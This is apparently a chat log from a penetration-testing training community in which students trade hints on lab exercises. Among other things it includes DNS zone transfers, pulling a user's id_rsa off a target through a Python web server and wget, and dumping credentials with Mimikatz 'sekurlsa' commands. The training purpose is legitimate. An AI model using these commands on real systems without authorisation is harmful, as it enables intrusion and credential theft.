LOL you're gonna be there for days with that scan! Remember UDP is the slowest to respond when scanning, so you want to have target ports in mind (in a best case scenario). Think about the question. Think about the information already provided to you. You can tighten that scan and make it more efficient instead of so broad.

You're so close man.

PORT STATE SERVICE VERSION
53/udp open domain NLnet Labs NSD

Thats what I get, NLnet Labs NSD but thats not the right answer

Heres the command I used - sudo nmap -sU -sV -p 53 10.129.216.96 --script dns-nsid.nse

You're so close! Think about how you can make that simpler. Sometimes you don't need fancy things to get information. Cut something from it

I'll cut the script and try again

I cut the script, I didn't change much. I think cut the-sV and got the below. I cant cut much else lol
PORT STATE SERVICE
53/udp open domain

DM me

Can someone give me a hint for below question? This question is the harder than other module as I am not a native English speaker… Some question is hard to understand what is asking for… Submitting flag is much easier…😭

M: DOCUMENTATION & REPORTING(Notetaking & Organization)
Q: What tool mentioned in this section can make logging a session easier?

I'm stuck on the Credential Hunting in Linux section of the Password Attacks module;
I've tried mutating the given password for Kira several different ways and have gotten nowhere, any hints?
edit: nevermind case sensitive username 😦

They are just asking for the name of a tool that was discussed in the chapter. One that has shell session logging capabilities

Go through the section, get the names of the tools they talk about, figure out which one has anything to do with sessions.

Never mind. It's just really really slow. I got the flag.

hello guys, anyone taking Pentester path and on getting started module? Need help on something please

I thought “tmux-logging” is the answer… but incorrect…. I am not

That’s ||not the name of the tool. That’s a command to configure the tool. What is the tool called?||

pet peeve: just ask the question.

this is the task: Once you gain access to 'user2', try to find a way to escalate your privileges to root, to get the flag in '/root/flag.txt'. - are you familiar with this?

getting started - privilege escalation section right

yes!

what is the question you have

I can't seem to figure out what to do on it. I read the module several times to determine my next action but I'm struggling. Now, I'm not sure if I need to learn other modules first before I can answer it and maybe I'm not taking the modules in correct order.

Thanks… I finally understood what the question means…

I was actually expecting that after reading the context I should be able to answer the challenges at the end. but It is not what I'm experiencing now. need advise.

ok, so you got access to user2 and have a shell yes? now you need to find a way to access the root user.
this is enumeration, pure and simple. start a checklist. everytime you make progress on anything: got a shell? enumerate. new box? enumerate.
in the module there are 10 things to look for that will help.
now that you have user2, start over. what can user2 access that user1 couldnt.
add each of those to the checklist.

thanks this seems to be a good strat. Ok I will start again with this strat. Thank you!

Maybe I found a bug in a room

Any administrator can contact me for moore infos

#858470491676737536

Hey is there anyone I can msg about my payload I'm using for Advanced Command Obfuscation?

Currently banging my head against a wall over Zone Transfers in the Information Gathering - Web Edition module... Any help with this would be greatly appreciated.

why is my kernal version not in the format they ask for?

what is it

6.0.12 is what parrot sec tells me when i put in uname -v

What is not working and what have you already tried?

what format they asking for

1.00.1 or something

seems like the same format to me 😛

digit.digit.digit

but it doesnt like it

rip idk

Well, it's not that things aren't working, it's that there is a total disconnect when it comes to understanding the dig and nslookup outputs and how it was determined that there are 2 zones...

well was worth a try

What exactly do you not understand?

How does this output == 2 zones

This is not directly visible on this output

https://www.cloudflare.com/learning/dns/glossary/dns-zone/

I'm assuming you're coming up with two zones based on the SOA entry, right?

hello, I am at the first step password attacks/network service. I am supposed to "Find the user for the WinRM service and crack their password."
I tried using crackmapexec with the password list xato....1000.txt and the top-usernames-shortlist.txt in Seclists...
Are there better lists I didn't find?

Funny enough, it was a total guess that happened to be correct. The Serial Number in the results is 2 and that just so happens to be the answer.

Your assumption makes sense and I appreciate the cloudflare link.

I'm remembering now that each can only have a single SOA, so that would make sense for those 2 to be it

My assumption comes from the fact that many students make this mistake.
By the way, the blue marked is a mail address 😉

https://www.cloudflare.com/learning/dns/dns-records/dns-soa-record/

Yea, I discovered that in some other output

The main reason I haven't touched the one marked in blue is because it was found to be a mail address

I'll test that out

Thanks for the help! I was finally able to complete that section.

hello how can I copy the id_rsa from a user to the attack machine?

scp, wget, nc, smbclient, ftp

but why do you want to do that is the question

im trying to complete a task for privilege escalation and I'm completely lost

do you have rce on the target?

sorry I'm totally new, what is RCE? I mean I'm able to get in to the remote machine and just trying to escalate privilege from user2 to root

what user is the id_rsa for?

user2?

yes user2

So the module should have talked about how to transfer files

One of them being python -m http.server <port> which starts a webserver on that port

Run that on the target machine in the directory where the id_rsa is.

no it did not, that's why im struggling

In another terminal window you can use wget http://IP:port/id_rsa

ill try this one

It most likely did in a different section

But you might not have taken notes on it

yeah, that's what I'm thinking that maybe I jumped to this module too early and shouldve taken a module that can prepare me for this

this is just getting started module though

Sections are not the same as modules. I'm not at my computer to double check for you but I'm fairly certain it talks about transferring files

Each module has several sections in it

You might use information from a previous section in the module at a later point

ok will back track. thanks!

There is a whole module as well regarding file transfers

Another way is cat id_rsa and copy the whole thing into a text file

i did this

i dont know how I should proceed after lol

You also need to make sure the rsa permissions are correct (iirc chmod 700)

Again the module itself talks about RSA permissions

I'd definitely reread everything and take notes

It's not a bad thing to take notes

the gospel

well to be fair, I'm taking notes. It's just that I'm not seeing the things I'm expecting to see hehe

It's bad to just copy/paste instead of rewriting info in your own words (aside from commands)

say for example this one

Yes

So

right after I enter vim id_rsa

it will direct me to the editor (i think it's expected)

YES

but where should I put the chmod after?

Ctrl+shift+v to paste into text editor

on that visualization it looks like you can do it step by step

Yes

you know what i mean?

After entering into the text editor and saving

:wq

For vim

And ssh syntax is ssh <user>@<IP> -i id_rsa

Also

and I get that, but it is not shown in the writeups

It's something that you can learn and Google

There are a good chunk of examples where the module gives you 90% of the info to learn and 10% requiring extra research

yeah i think that's the way they designed it

Learning how to research and look things up is a useful skill

The reason a writeup might omit something is if they believe it to be common knowledge

Also for modules that are t1+ you won't (or shouldn't) find any writeups

As writeups for any non-fundamental (tier-0) content is strictly prohibited

But I will say: info on how to complete modules is almost always within the module

If you want I can dm you tomorrow how I boil down command syntax

that would be awesome, but like what you've said the answer should be just somewhere

just need to be patient

Learning and taking good notes is a skill. Some people it's easier than others

It's just in how you naturally process information. Alongside that writing things down to help you reinforce it

Also you should be able to piece together known information with unknown info to ask better questions to google

Using <tool> to do <job>

Because a LOT of tools are REALLY well documented

so I figured it out lol

so funny that Transferring Files section comes after the Privilege Escalation topic lol

Eh it's because it's more meant to be "this is the 'hardest' way if you have no other options"

I figured it was not because of "transferring file", I was not using the correct user after gaining the rsa. I'm still using user2 and trying to go to root from it, instead of using root directly to ssh lol

that's fun

got the Flag! wheeeew

Gz

Hey all, I'm doing the third question of the Information Gathering - Web - Skills assessment where the question is: Perform active infrastructure identification against the host https://i.imgur.com. What server name is returned for the host? | I get a status code of 302 indicating that the URL has temporarily been moved to another location. What do I do now?

its all good I just curled the original URL hoping that they would be hosted on the same server and it worked

hi guys i am having trouble with this:

Using the techniques in this section obtain the cleartext credentials for the SCCM_SVC user.

basically i am putting the malicious file in the shared folder in c:\ but sccm_scv user wont access the folder so i am stck

Hello. I'm stuck on the first step of the Windows Privilege Escalation Skills Assessment - Part I. I don't know which user to connect to the target as. I do an nmap and see open RDP port 3389. Even with the --script rdp-ntlm-info and rdp-enum-encryption I get more information, but I can't find which user to use to connect to xfreerdp. Can someone help me please?

Hi I'm stuck at the last section of the footprinting module in DNS section.

I don't understand how to find the answer

what commands you tried

Hello. I need help for the skill assessment on Hacking WordPress. For the first question, I tried to enumerate with WPScan but it end up saying that the target doesn't appear to be running WordPress.

dig axfr internal.inlanefreight.com @<dns server>

got some results but non end in 203

tried listinbrute forcing same issue

So after zone transfer you can do another axfr on the found subdomains.

and add them to /etc/hosts

The only other subdomain I found axfrable(sorry...) is internal.

and don't I need to have the IP to add them ot the hosts?

you can add them in the same line with a space between the subdomains

nameserver IP same

Oh ok... I still don't see how it leads me to the answer tho

after you identify all subdomains with dig and add them to /etc/hosts, you can brute force them

can't you do that either way?

I don't think you can brute force if not in hosts file

Why would you add subdomains to /etc/hosts?

https://en.wikipedia.org/wiki/Hosts_(file)

In this task you will have a DNS server that will resolve the domains

oh ok my bad.
Then only the case if they are vhosts are needed in hosts file

No, not necessarily

Does the module have you use a certain name server?

that contains the .htb TLD

You only need the hosts file if

A) no DNS server is available for the resolution.
B) you want to manipulate the result from the DNS server.

yeah makes sense

The module Footprinting in the section DNS provides you with a DNS server as a target. This takes over the task as authoritative DNS server for the top-level domain .htb.

Ok so... I still can't find the answer... this is getting a bit funny

I have sent you a DM

I do not want to spoil the complete task here

Hey, I'm trying to complete the last section, Knowledge Check of the Getting Started module. I need a little hint. I got the admin creds, logged into the admin panel and found the right exploit. Minor spoiler ahead; ||the upload file button that I need to use for the exploit uses Adobe Flash Player, which is as we all know deprecated.|| Is there any way around this, or is this box broken? How would I approach that?

I guess there is an alternative path using metasploit, but is there a way to complete it using the path I described above?

Hi all, I am trying to find that admin password in the footprinting module, imap section. I am logged into the server and none of the commands work for me, I keep getting unknown command unless I put 'tag' in front of them. I can see the list of directories but I am not sure how to interact with them since all I am getting is error messages like "tag BAD Error in IMAP command FETCH: Invalid arguments (0.001 + 0.000 secs)."

hi, i'm stuck at question 2 of the password token module. i' decoded the token and replaced the htbuser with htbadmin then hexed and base64'd it. when i use that token to sign in as htbadmin it doesnt work. what am i doing wrong?

Hi guys, am I the only one who is experiencing problems when accessing the boxes at the end of the module?
Example:
I start the htb virtual machine and also start the target, but when I then run the (correct) commands they don't work.
Can anyone tell me why? Maybe I should be subscribed?

solved

where is python3 located in the pwnbox?

check with which python3

thanks a lot! Found it with the commans

command*

Please provide more context: what command are you running and what errors are you getting @rustic sage

Has anyone used the CRT pathway and taken the CRT recently?

I tried to enumerate page(gobusteer) & param(FFUF), I found couple of plugins. I submitted the answer(e.g. contact-form-7), but not correct.... May I know the hint how can I find correct plugin? I tried viewing source code, fuzz dir, param, reading readme.txt...

M:WordPress - Discovery & Enumeration
Q:Perform manual enumeration to discover another installed plugin. Submit the plugin name as the answer (3 words).

in the module introduction to network traffic analysis, on the tcpdump fundamental section, Question 2. " Were absolute or relative sequence numbers used during the capture?"Is that NOT a yes or no question? i mean even the hint asks a yes or no question, but neither yes, no, maybe, absolute sequence, or relative sequence work. Im much confused

Does anyone know why my dashboard shows 70% complete in general, but I've completed every General module?

No idea how this figure is calculated

Currently I have still one General and one Defensive module pending

All General finished. 2 Defensives outstanding.
General modules: Learning Process, Intro to Academy, Linux Fundamentals, Introduction to Bash Scripting, DNS Enumeration Using Python, Introduction to Networking, Web Requests, Windows Fundamentals, Introduction to Active Directory, Introduction to Web Applications, Intro to Network Traffic Analysis, Intro to Assembly Language, Setting Up, Introduction to Python 3, Testing Process, MacOS Fundamentals, Bug Bounty Hunting Process, Documentation and Reporting, Introduction to Windows Command Line.

@acoustic owl maybe there are more modules to be released until 100% are reached.

Were absolute or relative sequence numbers used during the capture?

Yes, I think so, that more modules come

But new modules are always coming... 😦

You will never stop learning 😉

I know. If someone told me about that back at school.... may never have gone into computers >.<

Now its too late. Far too late.

yes

That's not a yes or no question.

^

it's asking A or B

were Absolute(A) or Relative(B) sequence numbers used

because it will always capture A and B, but specifically which ones were used is the actual question

If you're struggling to answer that question on whether its absolute or relative, I'd suggest going back and re-reading the material. 🙂

it's more of a comprehension question than a material question

like if yes/no isn't the answer then make sure you understand what you're being asked

I see the S flag being used so the numbers are being changed over.

re-read the material then and figure out what you're missing or the crucial part to help you answer the question

Its case sensitive, thats why i couldn't get it. I knew the answer and tried copying and pasting from the material which is why i got so confused when it didn't work. I didn't realize that capitalization would be a problem

Thanks everyone for helping

I'm struggling some with the final assessment within the File Upload Attacks.
I can get files past the filter, read the source code for the PHP files, etc.

The issue I'm seeing is that if it's base64 encoded then it can't execute it as PHP and if svg it appears you can read files but can't do PHP code. Is there something I am missing here?

@west canopy case insensitive answers when?

hi guys i am having trouble with this:
windows priv escalation:
Using the techniques in this section obtain the cleartext credentials for the SCCM_SVC user.

basically i am putting the malicious file in the shared folder in c:\ but sccm_scv user wont access the folder so i am stck

any ideas>??

I mean it wouldn't hurt to specify they need to be capitalized especially in an intro level module.

yes that's why I pinged one of the people that actively hotfix the modules when there's an issue xD

I go with the approach, that if the question gives specific prompts for what the answers should be, then you should make them match how they've stated them.

sorry i just might've given an answer away hopefully that got deleted

if it's a fundamental module: they are generally more lax with 'spoilers' as it's a fairly simple question and sanity checking doesn't hurt

<@&861185840277487616>

i'm having an issue on the module for "Login Brute Forcing" on the "Skill assessment - Website" where it is super slow to brute force where it is estimating to take 36 hours which im sure is not the point of the module

not sure if its just my wordlists or what

thanks

are you sure there wasn't a username/password file provided in the resources section? (haven't done this module)

this is all that it gave me

this is the cheat sheet for the wordlists

Thanks @fathom pendant. You are very appreciated!

o7

For all his work, MarcieLee actually deserved the tag "HTB Community Contributor" as well. How can I nominate him?

To be perfectly honest, you both deserve to be our Community Contributors 🙂

Sorry for asking again...
I used aggressive plugin scan... but I can not find any correct answer... Is it possible to solve this question?

M:Attacking Common Applications: WordPress - Discovery & Enumeration
Q:Perform manual enumeration to discover another installed plugin. Submit the plugin name as the answer (3 words).

go through the pages

gobuster won't help you much as it is not needed

im not sure if there is any relation to the previous sections in the module like if i reuse a username? all the posts on the forum say it should be incredibly quick to crack, not take 36 hours lol

for sure it is not 36 hours to get to the credentials

use the wordlists from the cheatsheet

yea thats what i did

i mean theres 3 but i tried all of them

they are all pretty long idk

take a look at your command

estimated time does not always equate to exact time either :)

you can even try using wireshark to see if everything is ok

if username and password are high up on the list you'll get it well before the 36 hours

okay ill let it run for a while then

what's the full command you're running (not sure if the screenshot is cutoff or it's wrapped text

I see in your command you're using -S 3190, are you trying to connect to port 3190? if so it's actually -s; -S is SSL connection

nvm

i misread

hey im on password attacks module section passwd shadow and opasswd and they only showed how u open files and read em and crack

but i dont have any perms on will account to read them lol

what am i supposed to do

enumerate 😉

^ there is a folder that has the shadow and passwd files for easy transfer

rapped text

it shows the ful lthing

still goin

huh, like on linux or just on this machine?

let him enumerate marcilee

on that machine specifically it's not in the default location

yeah i found it

however it doesn't hurt to look

thanks

i didnt think i had to enumerate lol

rule #1 always enumerate

enumerate -> determine if need to escalate -> find escalate path -> repeat

does it take long to crack?

so ik if i did it good or it just takes this long xd

considering the full /etc/passwd file is there you might need to go in and edit any non-user accounts out of the unshadowed file

oh okay

gotchya

so just leave root?

up to you but this module does a fair bit of reuse of previously gained credentials

okay then ill leave it

but there are a handful of non-user accounts in there that aren't really useful :)

it says time left 5hours, i hope its not accurate

👀

usually not if you're using the mutated list from the provided resources

im using rockyou.txt

ethats what they used in the module

so i thought that should be it

not everything is gonna be 1:1

from what I remember pass attacks after it tells you how to make the mut_password.list uses that list

yeah

hello. mb someone can help me. i cant open target(ip in questions), browser shows white screen and 404 error in devtools, updating target cant help. at morning all was good

Is it a Docker container?
If not, are you connected to the Academy VPN?

Try it also once from the PwnBox

tryed, the same

Password Attacks >>> Network Services >>> Any clues as to what user list and password list I should be using? Apparently the resource list provided with the module will not get me there 😦

try rockyou

For both the user and password list ? - Seems like this will take a week to run 😄

the reading section should be more than enough to do it

just read it again and try to replicate it

The reading section used the user and password list from the module resources and didnt seem to cut it. I'll go back and try again

That is just crazy

copy and past the same commands twice

two diff results

thanks for your time!

doing AD: DCSync , I tried ssh into 172.16.5.225 with the right creds. and it gives wrong password, and mimikatz doesn't seem to be working as wanted

any help ?

you are welcome

dm me.

hey im on password attack pass the hash section and the question is "Connect via RDP and use Mimikatz located in c:\tools to extract the hashes presented in the current session. What is the NTLM/RC4 hash of David's account? "

they didnt mention dumping the hashes in this section?

Is the target given to you in the form of IP:PORT; if so you need to put http://IP:PORT into the browser

not JUST the IP

it does; take a close look at the example from Mimikatz

I believe it was taught earlier on though. You can simply refer to that

yeah, but i get error

it says that "sekurlsa::pth" module doesnt exist

huh weird

i didn't have any issues

Try privilege::debug first

i did

hmm

could you help me with this question? "What is the 2021 OWASP Top 10 classification for this vulnerability?"

https://owasp.org/Top10/

i tried

to put in the field all of these

but it didnt work

Think about the type of attack it is and match it with that classification

you have put your entire command between quotes

so maybe that's the issue?

you're talking about everything after the pth part yeah?

first character is "

yes and it ends with a " it looks like the right half of the terminal was not included in the screenshot but screenwrap shows an ending "

at least that's what it appears to me

the hint is dash but nothing from this list has a dash

yup, same here

and it ends with 'n'

Look how they're classified A##:2021-<Classification>

yes so that would be A10:2021

but it doesn't fit

how is it A10? is it server-side request?

yeah

are you SURE

i think so

What do you do to perform the exploit

injection i guess

idk

Just take a minute to walk yourself through the attack

ah i dont quite understand it

I'm trying to basically tell you: you shouldn't guess, you should be sure

yeah I get your point, but I'm not sure, maybe I should get back to the previous lessons

yeah

idk whats the problem.....

"try harder" might suggest hammering the tree with a hammer but I would suggest taking a break

i did

put it between quotes

try without please

right

i fixed it

but i still dont get it how to exract the hashes with mimikatz?

cuz i didnt see it anywhere being in the module

try:

sekurlsa::logonpasswords

thanks!!

pleasure

....

now tis is f-ing me up i cant import

it

Is it psd1 or ps1

it says psd1

in the module

So if you dir

It also shows psd1

dir where?

Just making sure

Oh

I see your issue

You're not in the C:\tools directory

check the path

Iirc that's where they're located at

oh shi im dumb

thanks again...

You understand that when you are specifying .\ in that format, it means call the local directory location, right? So you need to be in the directory with the file to use the command in that format.

i know, still not working

I am currently having issues with odat.py in the footprinting module. When I try to use odat.py, I get the following error: "root㉿kali)-[~/odat]
└─# ./odat.py -h
Traceback (most recent call last):
File "./odat.py", line 5, in <module>
from libnmap.parser import NmapParser
ImportError: No module named libnmap.parser"